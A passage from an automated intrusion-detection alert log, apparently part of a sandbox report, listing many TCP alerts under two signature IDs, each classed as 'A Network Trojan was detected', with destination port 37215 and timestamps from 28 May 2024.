          SID:2829579
          Source Port:47660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475453
          SID:2829579
          Source Port:36188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160173
          SID:2829579
          Source Port:34770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471072
          SID:2835222
          Source Port:41204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953543
          SID:2829579
          Source Port:48118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039107
          SID:2835222
          Source Port:47544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182350
          SID:2829579
          Source Port:52318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484938
          SID:2835222
          Source Port:58548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277944
          SID:2835222
          Source Port:53298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325763
          SID:2835222
          Source Port:37114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680695
          SID:2829579
          Source Port:42814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713580
          SID:2829579
          Source Port:57964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979343
          SID:2829579
          Source Port:35476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848378
          SID:2829579
          Source Port:52724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.069236
          SID:2835222
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102234
          SID:2829579
          Source Port:47496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650259
          SID:2829579
          Source Port:50848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708412
          SID:2835222
          Source Port:54254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405069
          SID:2829579
          Source Port:44188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988935
          SID:2829579
          Source Port:59796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033412
          SID:2829579
          Source Port:39464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401605
          SID:2835222
          Source Port:38580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724359
          SID:2829579
          Source Port:41728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.507822
          SID:2835222
          Source Port:46760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793280
          SID:2829579
          Source Port:40920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182727
          SID:2835222
          Source Port:51502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437430
          SID:2835222
          Source Port:43732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151200
          SID:2829579
          Source Port:51550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332710
          SID:2835222
          Source Port:50936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.180481
          SID:2829579
          Source Port:59154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.620317
          SID:2835222
          Source Port:40384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970243
          SID:2829579
          Source Port:33264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141746
          SID:2835222
          Source Port:39050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.079463
          SID:2829579
          Source Port:42194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.692092
          SID:2829579
          Source Port:60996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935275
          SID:2835222
          Source Port:43642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.854133
          SID:2829579
          Source Port:56884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270295
          SID:2835222
          Source Port:49284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488778
          SID:2829579
          Source Port:58680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.482527
          SID:2829579
          Source Port:60940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141617
          SID:2829579
          Source Port:53342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161632
          SID:2829579
          Source Port:55808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322824
          SID:2835222
          Source Port:52346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.886347
          SID:2835222
          Source Port:41390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732122
          SID:2829579
          Source Port:60244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337193
          SID:2835222
          Source Port:32818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123806
          SID:2829579
          Source Port:41528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112900
          SID:2835222
          Source Port:42782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755810
          SID:2829579
          Source Port:42618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741833
          SID:2835222
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178915
          SID:2829579
          Source Port:56312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656192
          SID:2835222
          Source Port:52688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959687
          SID:2829579
          Source Port:59486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764080
          SID:2829579
          Source Port:59218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.475292
          SID:2835222
          Source Port:56964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.611886
          SID:2835222
          Source Port:45590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804904
          SID:2835222
          Source Port:43336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809912
          SID:2835222
          Source Port:33366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214004
          SID:2835222
          Source Port:60114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.889872
          SID:2829579
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111256
          SID:2829579
          Source Port:37422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590733
          SID:2835222
          Source Port:34642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953206
          SID:2835222
          Source Port:40762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185632
          SID:2829579
          Source Port:53766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926646
          SID:2829579
          Source Port:41276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839830
          SID:2835222
          Source Port:35674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337577
          SID:2829579
          Source Port:45008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992882
          SID:2835222
          Source Port:52178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203944
          SID:2829579
          Source Port:43204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154730
          SID:2829579
          Source Port:41900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932933
          SID:2835222
          Source Port:56400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187424
          SID:2835222
          Source Port:45026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931898
          SID:2835222
          Source Port:48958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664956
          SID:2835222
          Source Port:59144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594290
          SID:2835222
          Source Port:59080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336639
          SID:2835222
          Source Port:49438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752361
          SID:2835222
          Source Port:34822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103007
          SID:2835222
          Source Port:38020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843157
          SID:2835222
          Source Port:55926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187963
          SID:2835222
          Source Port:33052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497520
          SID:2829579
          Source Port:35624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.629145
          SID:2835222
          Source Port:56694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987924
          SID:2829579
          Source Port:46866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513091
          SID:2829579
          Source Port:39024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923038
          SID:2835222
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876565
          SID:2835222
          Source Port:44444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.172033
          SID:2829579
          Source Port:37296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656215
          SID:2829579
          Source Port:37862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652500
          SID:2835222
          Source Port:56318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485727
          SID:2835222
          Source Port:53884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061243
          SID:2835222
          Source Port:56466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185779
          SID:2835222
          Source Port:54092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334341
          SID:2829579
          Source Port:58596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543627
          SID:2829579
          Source Port:47202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907901
          SID:2829579
          Source Port:38478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817961
          SID:2835222
          Source Port:36416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187427
          SID:2829579
          Source Port:35364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020589
          SID:2829579
          Source Port:60634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891633
          SID:2829579
          Source Port:38672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046949
          SID:2835222
          Source Port:44808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328900
          SID:2829579
          Source Port:49190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930984
          SID:2829579
          Source Port:59902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299572
          SID:2835222
          Source Port:36678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301014
          SID:2835222
          Source Port:47410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234102
          SID:2829579
          Source Port:60050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.127467
          SID:2829579
          Source Port:59620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178554
          SID:2835222
          Source Port:51266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711252
          SID:2835222
          Source Port:33648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739803
          SID:2835222
          Source Port:38488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804651
          SID:2829579
          Source Port:50698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466290
          SID:2835222
          Source Port:44986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627114
          SID:2829579
          Source Port:39966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772941
          SID:2829579
          Source Port:56400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.307259
          SID:2835222
          Source Port:60690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081218
          SID:2835222
          Source Port:43734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268637
          SID:2835222
          Source Port:41196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977394
          SID:2829579
          Source Port:50110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481107
          SID:2835222
          Source Port:56310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983744
          SID:2835222
          Source Port:48596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299536
          SID:2829579
          Source Port:59482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555269
          SID:2829579
          Source Port:54612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816197
          SID:2835222
          Source Port:59396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287660
          SID:2829579
          Source Port:59202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350504
          SID:2835222
          Source Port:34238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857756
          SID:2835222
          Source Port:39696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.223478
          SID:2829579
          Source Port:43838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536511
          SID:2835222
          Source Port:59170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591197
          SID:2829579
          Source Port:39328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598877
          SID:2835222
          Source Port:36252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221282
          SID:2829579
          Source Port:36498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482962
          SID:2829579
          Source Port:47766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157000
          SID:2829579
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414254
          SID:2835222
          Source Port:58692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890198
          SID:2829579
          Source Port:60964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536756
          SID:2835222
          Source Port:45592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046968
          SID:2829579
          Source Port:45066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922946
          SID:2835222
          Source Port:45096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722380
          SID:2835222
          Source Port:51738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887746
          SID:2835222
          Source Port:43820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665197
          SID:2835222
          Source Port:46264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102376
          SID:2835222
          Source Port:55318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685841
          SID:2829579
          Source Port:43798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.065034
          SID:2835222
          Source Port:60406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528165
          SID:2835222
          Source Port:33954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138171
          SID:2835222
          Source Port:47300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.174095
          SID:2835222
          Source Port:38018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.707848
          SID:2835222
          Source Port:49880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976816
          SID:2829579
          Source Port:39802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483127
          SID:2835222
          Source Port:55800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594623
          SID:2829579
          Source Port:38002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973034
          SID:2835222
          Source Port:54596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115657
          SID:2829579
          Source Port:38808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730508
          SID:2835222
          Source Port:56686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243653
          SID:2829579
          Source Port:57382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299260
          SID:2835222
          Source Port:35426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711458
          SID:2835222
          Source Port:35050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.363483
          SID:2835222
          Source Port:45852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669319
          SID:2829579
          Source Port:54758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221589
          SID:2835222
          Source Port:58534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154334
          SID:2829579
          Source Port:40906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067258
          SID:2835222
          Source Port:43130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283691
          SID:2829579
          Source Port:33652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277648
          SID:2829579
          Source Port:34046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186006
          SID:2829579
          Source Port:44196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325924
          SID:2835222
          Source Port:51354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.990491
          SID:2835222
          Source Port:53894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923053
          SID:2829579
          Source Port:50040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215354
          SID:2829579
          Source Port:56996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.368513
          SID:2835222
          Source Port:38732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298975
          SID:2835222
          Source Port:55506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.076119
          SID:2829579
          Source Port:39248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496673
          SID:2835222
          Source Port:49596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818703
          SID:2835222
          Source Port:40650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732051
          SID:2829579
          Source Port:41556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980677
          SID:2829579
          Source Port:60722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298281
          SID:2829579
          Source Port:39314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196933
          SID:2835222
          Source Port:36484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559252
          SID:2829579
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322090
          SID:2829579
          Source Port:48888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115532
          SID:2829579
          Source Port:50928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471184
          SID:2829579
          Source Port:53394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484637
          SID:2829579
          Source Port:56710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.069484
          SID:2835222
          Source Port:53636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.615148
          SID:2829579
          Source Port:48278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.911273
          SID:2835222
          Source Port:52724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207043
          SID:2829579
          Source Port:59884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336656
          SID:2835222
          Source Port:43174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211155
          SID:2835222
          Source Port:46786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744529
          SID:2835222
          Source Port:42210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845515
          SID:2829579
          Source Port:50532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923244
          SID:2829579
          Source Port:56920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552658
          SID:2835222
          Source Port:55152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210824
          SID:2835222
          Source Port:56656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963697
          SID:2829579
          Source Port:55544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.037245
          SID:2835222
          Source Port:60198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475709
          SID:2835222
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155067
          SID:2829579
          Source Port:45866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543250
          SID:2829579
          Source Port:41018
          Destination Port:37215
